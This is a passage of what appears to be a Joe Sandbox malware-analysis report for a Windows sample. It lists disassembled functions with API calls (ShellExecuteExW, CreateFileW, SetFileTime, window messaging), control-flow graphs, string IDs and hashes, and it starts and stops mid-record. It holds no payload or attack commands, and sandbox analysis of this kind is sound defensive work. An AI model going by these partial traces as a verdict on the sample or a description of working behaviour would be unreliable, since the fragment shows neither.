                                                            • GetDlgItem.USER32(?,00000066), ref: 00BECC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00BECC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,00C1A472), ref: 00BECC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BECC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: 2a929715a9bb2fd2fa40b90e072a4ccaebc39a8947deedca713dc76d06963b0f
                                                            • Instruction ID: ebd33379e16556758be2bc9d2da865a63cef0e688158b60b60f6514b919fb976
                                                            • Opcode Fuzzy Hash: 2a929715a9bb2fd2fa40b90e072a4ccaebc39a8947deedca713dc76d06963b0f
                                                            • Instruction Fuzzy Hash: 53E14172900298AADB25EBA5DD85EEE77FCEF04350F1040E6F609E7150EB749E858B60
                                                            Function 00BDDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BDDA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BDDAAC
                                                              • Part of subcall function 00BDC29A: _wcslen.LIBCMT ref: 00BDC2A2
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                              • Part of subcall function 00BE1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BDBAE9,00000000,?,?,?,0001043E), ref: 00BE1BA0
                                                            • _wcslen.LIBCMT ref: 00BDDDE9
                                                            • __fprintf_l.LIBCMT ref: 00BDDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: 766c302f7d7d2b740a2fd0aad65d44c4adf0a00c623608e230cb21d9775ece0a
                                                            • Instruction ID: 17cfb066a2e777f623bf92b449d390818e1a54b3e22eaebe60b5e47440779c59
                                                            • Opcode Fuzzy Hash: 766c302f7d7d2b740a2fd0aad65d44c4adf0a00c623608e230cb21d9775ece0a
                                                            • Instruction Fuzzy Hash: DB32C171A00219ABCF24EF68C842BE9B7E5EF14700F4045ABFA55AB391F7B1D985CB50
                                                            Function 00BED4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                              • Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                              • Part of subcall function 00BEB568: IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                              • Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
                                                              • Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            • GetDlgItem.USER32(00000068,00C2FCB8), ref: 00BED4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00BEAF07,00000001,?,?,00BEB7B9,00C0506C,00C2FCB8,00C2FCB8,00001000,00000000,00000000), ref: 00BED510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BED51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BED529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BED559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BED5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C043F4), ref: 00BED5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: 66aad861f1057fe306fc8649c371e2d041f461c549f2b991ef2082038a4ca7f4
                                                            • Instruction ID: 4db6b7eb70e2ff2230cb6ca0b94ef4b34d276482d03387f6ab9d44dc29100f65
                                                            • Opcode Fuzzy Hash: 66aad861f1057fe306fc8649c371e2d041f461c549f2b991ef2082038a4ca7f4
                                                            • Instruction Fuzzy Hash: 8C31BF71245382AFE301DF20DC4AFAF7FACEB96704F000518FA51961E0DB659A09CBB6
                                                            Function 00BED78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 836 bed78f-bed7a7 call beec50 839 bed7ad-bed7b9 call bf3e13 836->839 840 bed9e8-bed9f0 836->840 839->840 843 bed7bf-bed7e7 call befff0 839->843 846 bed7e9 843->846 847 bed7f1-bed7ff 843->847 846->847 848 bed812-bed818 847->848 849 bed801-bed804 847->849 851 bed85b-bed85e 848->851 850 bed808-bed80e 849->850 852 bed837-bed844 850->852 853 bed810 850->853 851->850 854 bed860-bed866 851->854 856 bed84a-bed84e 852->856 857 bed9c0-bed9c2 852->857 855 bed822-bed82c 853->855 858 bed86d-bed86f 854->858 859 bed868-bed86b 854->859 862 bed82e 855->862 863 bed81a-bed820 855->863 864 bed9c6 856->864 865 bed854-bed859 856->865 857->864 860 bed882-bed898 call bdb92d 858->860 861 bed871-bed878 858->861 859->858 859->860 871 bed89a-bed8a7 call be1fbb 860->871 872 bed8b1-bed8bc call bda231 860->872 861->860 866 bed87a 861->866 862->852 863->855 868 bed830-bed833 863->868 870 bed9cf 864->870 865->851 866->860 868->852 873 bed9d6-bed9d8 870->873 871->872 881 bed8a9 871->881 882 bed8be-bed8d5 call bdb6c4 872->882 883 bed8d9-bed8e6 ShellExecuteExW 872->883 876 bed9da-bed9dc 873->876 877 bed9e7 873->877 876->877 878 bed9de-bed9e1 ShowWindow 876->878 877->840 878->877 881->872 882->883 883->877 884 bed8ec-bed8f9 883->884 886 bed90c-bed90e 884->886 887 bed8fb-bed902 884->887 890 bed925-bed944 call bedc3b 886->890 891 bed910-bed919 886->891 887->886 889 bed904-bed90a 887->889 889->886 892 bed97b-bed987 CloseHandle 889->892 890->892 905 bed946-bed94e 890->905 891->890 899 bed91b-bed923 ShowWindow 891->899 893 bed998-bed9a6 892->893 894 bed989-bed996 call be1fbb 892->894 893->873 898 bed9a8-bed9aa 893->898 894->870 894->893 898->873 902 bed9ac-bed9b2 898->902 899->890 902->873 904 bed9b4-bed9be 902->904 904->873 905->892 906 bed950-bed961 GetExitCodeProcess 905->906 906->892 907 bed963-bed96d 906->907 908 bed96f 907->908 909 bed974 907->909 908->909 909->892
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BED7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 00BED8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 00BED91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00BED959
                                                            • CloseHandle.KERNEL32(?), ref: 00BED97F
                                                            • ShowWindow.USER32(?,00000001), ref: 00BED9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: 033c758703715c78b054fb8c33d6f28f6136ac189c1ab62f9519af73a4c98d58
                                                            • Instruction ID: 067606b1dfc72e9f85e6300e8dcc4b0dc6bbadf3a28d94c20395484ba8cec279
                                                            • Opcode Fuzzy Hash: 033c758703715c78b054fb8c33d6f28f6136ac189c1ab62f9519af73a4c98d58
                                                            • Instruction Fuzzy Hash: E451C1751043C09AEB309F269C44BAFBBE4EF42744F04089EF9C5971A2E7F58985CB52
                                                            Function 00BFA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 910 bfa95b-bfa974 911 bfa98a-bfa98f 910->911 912 bfa976-bfa986 call bfef4c 910->912 914 bfa99c-bfa9c0 MultiByteToWideChar 911->914 915 bfa991-bfa999 911->915 912->911 922 bfa988 912->922 916 bfa9c6-bfa9d2 914->916 917 bfab53-bfab66 call befbbc 914->917 915->914 919 bfaa26 916->919 920 bfa9d4-bfa9e5 916->920 926 bfaa28-bfaa2a 919->926 923 bfa9e7-bfa9f6 call c02010 920->923 924 bfaa04-bfaa15 call bf8e06 920->924 922->911 929 bfab48 923->929 937 bfa9fc-bfaa02 923->937 924->929 938 bfaa1b 924->938 926->929 930 bfaa30-bfaa43 MultiByteToWideChar 926->930 931 bfab4a-bfab51 call bfabc3 929->931 930->929 934 bfaa49-bfaa5b call bfaf6c 930->934 931->917 939 bfaa60-bfaa64 934->939 941 bfaa21-bfaa24 937->941 938->941 939->929 942 bfaa6a-bfaa71 939->942 941->926 943 bfaaab-bfaab7 942->943 944 bfaa73-bfaa78 942->944 946 bfaab9-bfaaca 943->946 947 bfab03 943->947 944->931 945 bfaa7e-bfaa80 944->945 945->929 948 bfaa86-bfaaa0 call bfaf6c 945->948 950 bfaacc-bfaadb call c02010 946->950 951 bfaae5-bfaaf6 call bf8e06 946->951 949 bfab05-bfab07 947->949 948->931 963 bfaaa6 948->963 954 bfab09-bfab22 call bfaf6c 949->954 955 bfab41-bfab47 call bfabc3 949->955 950->955 966 bfaadd-bfaae3 950->966 951->955 962 bfaaf8 951->962 954->955 968 bfab24-bfab2b 954->968 955->929 967 bfaafe-bfab01 962->967 963->929 966->967 967->949 969 bfab2d-bfab2e 968->969 970 bfab67-bfab6d 968->970 971 bfab2f-bfab3f WideCharToMultiByte 969->971 970->971 971->955 972 bfab6f-bfab76 call bfabc3 971->972 972->931
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BF5695,00BF5695,?,?,?,00BFABAC,00000001,00000001,2DE85006), ref: 00BFA9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BFABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BFAA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BFAB35
                                                            • __freea.LIBCMT ref: 00BFAB42
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            • __freea.LIBCMT ref: 00BFAB4B
                                                            • __freea.LIBCMT ref: 00BFAB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 9e2889a6cc29d82f5a73ae8bfd423b1e14a79b4ca2726cf6116b86baee658040
                                                            • Instruction ID: 189ba67208b8e37cc4bf5221b78c7aae69d8c165a0ac12a44dbb0d5aeca68753
                                                            • Opcode Fuzzy Hash: 9e2889a6cc29d82f5a73ae8bfd423b1e14a79b4ca2726cf6116b86baee658040
                                                            • Instruction Fuzzy Hash: FE51B4B261021AAFDB298F64CC81EBFB7EAEB44750F1546A9FE08D7141DB34DC48C691
                                                            Function 00BF3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 975 bf3b72-bf3b7c 976 bf3bee-bf3bf1 975->976 977 bf3b7e-bf3b8c 976->977 978 bf3bf3 976->978 980 bf3b8e-bf3b91 977->980 981 bf3b95-bf3bb1 LoadLibraryExW 977->981 979 bf3bf5-bf3bf9 978->979 982 bf3c09-bf3c0b 980->982 983 bf3b93 980->983 984 bf3bfa-bf3c00 981->984 985 bf3bb3-bf3bbc GetLastError 981->985 982->979 987 bf3beb 983->987 984->982 986 bf3c02-bf3c03 FreeLibrary 984->986 988 bf3bbe-bf3bd3 call bf6088 985->988 989 bf3be6-bf3be9 985->989 986->982 987->976 988->989 992 bf3bd5-bf3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BF3C35,?,?,00C32088,00000000,?,00BF3D60,00000004,InitializeCriticalSectionEx,00C06394,InitializeCriticalSectionEx,00000000), ref: 00BF3C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: f16918a4ee016a0d492bc89d4706fa0731adf93868a497e9e0f7d99ac1256247
                                                            • Instruction ID: a05f80f08a7941d8e139bbc5bfa8d1c5cafaf2d4a5c85145b95c1781b8ce9fc3
                                                            • Opcode Fuzzy Hash: f16918a4ee016a0d492bc89d4706fa0731adf93868a497e9e0f7d99ac1256247
                                                            • Instruction Fuzzy Hash: 0611CA31A45629ABCB218B689C51B6D37E4DF01B70F250190FA15FB291D771EF48C6D1
                                                            Function 00BEAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                              • Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            • OleInitialize.OLE32(00000000), ref: 00BEAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BEAC66
                                                            • SHGetMalloc.SHELL32(00C18438), ref: 00BEAC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3Ro
                                                            • API String ID: 3498096277-3613677438
                                                            • Opcode ID: deee41c6bc965bf9b6bc7309b7106a06a0b5e5fffe14385aca050a7bd5850ab8
                                                            • Instruction ID: 330f14e51aa96b9563c57b740a86f79b9cee6fbfeb6e796dfcc42ec4475509ca
                                                            • Opcode Fuzzy Hash: deee41c6bc965bf9b6bc7309b7106a06a0b5e5fffe14385aca050a7bd5850ab8
                                                            • Instruction Fuzzy Hash: 13F036B1D00249ABCB10AFA9D949ADFFFFCEF84700F004156E555E2251DBB45645CFA1
                                                            Function 00BD98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 997 bd98e0-bd9901 call beec50 1000 bd990c 997->1000 1001 bd9903-bd9906 997->1001 1003 bd990e-bd991f 1000->1003 1001->1000 1002 bd9908-bd990a 1001->1002 1002->1003 1004 bd9927-bd9931 1003->1004 1005 bd9921 1003->1005 1006 bd9936-bd9943 call bd6edb 1004->1006 1007 bd9933 1004->1007 1005->1004 1010 bd994b-bd996a CreateFileW 1006->1010 1011 bd9945 1006->1011 1007->1006 1012 bd996c-bd998e GetLastError call bdbb03 1010->1012 1013 bd99bb-bd99bf 1010->1013 1011->1010 1018 bd99c8-bd99cd 1012->1018 1019 bd9990-bd99b3 CreateFileW GetLastError 1012->1019 1015 bd99c3-bd99c6 1013->1015 1017 bd99d9-bd99de 1015->1017 1015->1018 1021 bd99ff-bd9a10 1017->1021 1022 bd99e0-bd99e3 1017->1022 1018->1017 1020 bd99cf 1018->1020 1019->1015 1023 bd99b5-bd99b9 1019->1023 1020->1017 1025 bd9a2e-bd9a39 1021->1025 1026 bd9a12-bd9a2a call be0602 1021->1026 1022->1021 1024 bd99e5-bd99f9 SetFileTime 1022->1024 1023->1015 1024->1021 1026->1025
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00BD7760,?,00000005,?,00000011), ref: 00BD995F
                                                            • GetLastError.KERNEL32(?,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00BD7760,?,00000005,?), ref: 00BD99A2
                                                            • GetLastError.KERNEL32(?,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD99F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 8f79f0c46fae011e5170a5dd0c0a017d770449af48806226c8bb90799d7ed214
                                                            • Instruction ID: 44c5a5975cdebf4775225905c1f973708328c0757e2585ea16a71f6329b4a30b
                                                            • Opcode Fuzzy Hash: 8f79f0c46fae011e5170a5dd0c0a017d770449af48806226c8bb90799d7ed214
                                                            • Instruction Fuzzy Hash: 8B3126305457856FE7309F24CC45BDAFBD8FB04324F100B5AF5A5962D0E3B89944CB95
                                                            Function 00BEB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1056 beb568-beb581 PeekMessageW 1057 beb5bc-beb5be 1056->1057 1058 beb583-beb597 GetMessageW 1056->1058 1059 beb5a8-beb5b6 TranslateMessage DispatchMessageW 1058->1059 1060 beb599-beb5a6 IsDialogMessageW 1058->1060 1059->1057 1060->1057 1060->1059
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                            • IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                            • TranslateMessage.USER32(?), ref: 00BEB5AC
                                                            • DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 497055cb07f4a98f5a6e565de23bf35e8d77846ba6ac55e84a487ca32c0635b8
                                                            • Instruction ID: 30e207d2f45f394a7218af2d26141e6ba52da48468f9b2a84954fe5646d2068c
                                                            • Opcode Fuzzy Hash: 497055cb07f4a98f5a6e565de23bf35e8d77846ba6ac55e84a487ca32c0635b8
                                                            • Instruction Fuzzy Hash: 40F0BD71A1119AAB8B249BE69C4CFDF7FECEE053917004415B915D2050EB34D605CBB0
                                                            Function 00BEABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1061 beabab-beabca GetClassNameW 1062 beabcc-beabe1 call be1fbb 1061->1062 1063 beabf2-beabf4 1061->1063 1068 beabe3-beabef FindWindowExW 1062->1068 1069 beabf1 1062->1069 1064 beabff-beac01 1063->1064 1065 beabf6-beabf9 SHAutoComplete 1063->1065 1065->1064 1068->1069 1069->1063
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00BEABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00BEABF9
                                                              • Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BEABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
